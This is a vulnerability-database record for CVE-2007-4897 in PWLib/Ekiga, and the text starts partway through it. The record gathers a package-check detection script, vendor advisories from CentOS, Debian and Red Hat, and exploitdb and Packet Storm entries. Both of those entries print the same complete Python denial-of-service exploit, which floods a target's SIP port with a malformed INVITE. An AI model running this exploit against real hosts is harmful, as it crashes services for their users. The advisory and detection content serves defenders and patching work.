yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpwlib1-devel-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpwlib1-plugins-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpwlib1-plugins-avc-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpwlib1-plugins-dc-1.10.10-2.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T10:10:17", "bulletinFamily": "exploit", "description": "Ekiga 2.0.5 (GetHostAddress) Remote Denial of Service Exploit. CVE-2007-4897. Dos exploit for windows platform", "modified": "2009-07-24T00:00:00", "published": "2009-07-24T00:00:00", "id": "EDB-ID:9241", "href": "https://www.exploit-db.com/exploits/9241/", "type": "exploitdb", "title": "Ekiga 2.0.5 - GetHostAddress Remote Denial of Service Exploit", "sourceData": "#!/usr/bin/env python\r\n#\r\n# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)\r\n#\r\n# ekiga207_dos.py by Jose Miguel Esparza\r\n# 2007-09-11 S21sec labs\r\n\r\nimport sys,socket\r\n\r\nif len(sys.argv) != 3: \r\n\tsys.exit(\"Usage: \" + sys.argv[0] + \" target_host target_port\\n\")\r\ntarget = sys.argv[1]\r\ntargetPort = int(sys.argv[2])\r\nmalformedRequest = \"INVITE \"+'A'*1005+\" SIP/2.0\\r\\n\"+\\\r\n\t\t \"Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\\r\\n\"+\\\r\n\t\t \"Contact:sip:pepe@172.91.1.133:5060\\r\\n\"+\\\r\n\t\t \"Content-Length:417\\r\\n\"+\\\r\n\t\t \"Content-Type:application/sdp\\r\\n\"+\\\r\n\t\t \"CSeq:4321 INVITE\\r\\n\"+\\\r\n\t\t \"From:sip:pepe@172.91.1.148:5060;tag=a48s\\r\\n\"+\\\r\n\t\t \"Max-Forwards:70\\r\\n\"+\\\r\n \"To:sip:paco@micasa.com\\r\\n\"+\\\r\n \"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\\r\\n\\r\\n\"\t\t \r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ns.connect((target,targetPort))\r\ns.sendall(malformedRequest)\r\ns.close()\r\n\r\n# milw0rm.com [2009-07-24]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9241/"}], "centos": [{"lastseen": "2019-05-29T18:35:13", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0932\n\n\nPWLib is a library used to support cross-platform applications. \r\n\r\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application uses\r\nPWLib.\r\n\r\nA memory management flaw was discovered in PWLib. An attacker could use this\r\nflaw to crash an application, such as Ekiga, which is linked with pwlib\r\n(CVE-2007-4897). \r\n\r\nUsers should upgrade to these updated packages which contain a backported\r\npatch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/014288.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/014289.html\n\n**Affected packages:**\npwlib\npwlib-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0932.html", "modified": "2007-10-09T23:40:55", "published": "2007-10-09T23:40:54", "href": "http://lists.centos.org/pipermail/centos-announce/2007-October/014288.html", "id": "CESA-2007:0932", "title": "pwlib security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:17", "bulletinFamily": "exploit", "description": "", "modified": "2009-07-24T00:00:00", "published": "2009-07-24T00:00:00", "href": "https://packetstormsecurity.com/files/79578/Ekiga-2.0.5-Denial-Of-Service.html", "id": "PACKETSTORM:79578", "type": "packetstorm", "title": "Ekiga 2.0.5 Denial Of Service", "sourceData": "`#!/usr/bin/env python \n# \n# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897) \n# \n# ekiga207_dos.py by Jose Miguel Esparza \n# 2007-09-11 S21sec labs \n \nimport sys,socket \n \nif len(sys.argv) != 3: \nsys.exit(\"Usage: \" + sys.argv[0] + \" target_host target_port\\n\") \ntarget = sys.argv[1] \ntargetPort = int(sys.argv[2]) \nmalformedRequest = \"INVITE \"+'A'*1005+\" SIP/2.0\\r\\n\"+\\ \n\"Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\\r\\n\"+\\ \n\"Contact:sip:pepe@172.91.1.133:5060\\r\\n\"+\\ \n\"Content-Length:417\\r\\n\"+\\ \n\"Content-Type:application/sdp\\r\\n\"+\\ \n\"CSeq:4321 INVITE\\r\\n\"+\\ \n\"From:sip:pepe@172.91.1.148:5060;tag=a48s\\r\\n\"+\\ \n\"Max-Forwards:70\\r\\n\"+\\ \n\"To:sip:paco@micasa.com\\r\\n\"+\\ \n\"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\\r\\n\\r\\n\" \n \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.connect((target,targetPort)) \ns.sendall(malformedRequest) \ns.close() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/79578/ekiga207_dos.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:23:00", "bulletinFamily": "unix", "description": "Gerfried Fuchs uploaded new packages for pwlib which fixed the\nfollowing security problem:\n\nCVE-2007-4897\n\n pwlib, as used by Ekiga 2.0.5 and possibly other products, allows\n remote attackers to cause a denial of service (application crash)\n via a long argument to the PString::vsprintf function, related to\n a "memory management flaw".\n NOTE: this issue was originally reported as being in the\n SIPURL::GetHostAddress function in Ekiga (formerly GnomeMeeting).\n\nFor the etch-backports distribution the problem has been fixed in\nversion 1.10.10-2~bpo40+1.\n\nFor the lenny and sid distributions the problem has been fixed in\nversion 1.10.10-1.1.\n\n\nUpgrade instructions\n--------------------\n\nIf you don't use pinning (see [1]) you have to update the packages\nmanually via "apt-get -t etch-backports install <packagelist>" with the\npackagelist of your installed packages affected by this update.\n[1] <http://backports.org/dokuwiki/doku.php?id=instructions>\n\nWe recommend to pin the backports repository to 200 so that new versions\nof installed backports will be installed automatically:\n\n Package: *\n Pin: release a=etch-backports\n Pin-Priority: 200\n", "modified": "2008-12-09T13:42:01", "published": "2008-12-09T13:42:01", "id": "DEBIAN:B539EAF12FF57A243523C118FB3AAA47:81EF2", "href": "https://lists.debian.org/debian-backports-announce/2008/debian-backports-announce-200812/msg00003.html", "title": "[Backports-security-announce] Security Update for pwlib", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:03", "bulletinFamily": "unix", "description": "PWLib is a library used to support cross-platform applications. \r\n\r\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application uses\r\nPWLib.\r\n\r\nA memory management flaw was discovered in PWLib. An attacker could use this\r\nflaw to crash an application, such as Ekiga, which is linked with pwlib\r\n(CVE-2007-4897). \r\n\r\nUsers should upgrade to these updated packages which contain a backported\r\npatch to correct this issue.", "modified": "2017-09-08T12:06:21", "published": "2007-10-08T04:00:00", "id": "RHSA-2007:0932", "href": "https://access.redhat.com/errata/RHSA-2007:0932", "type": "redhat", "title": "(RHSA-2007:0932) Moderate: pwlib security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}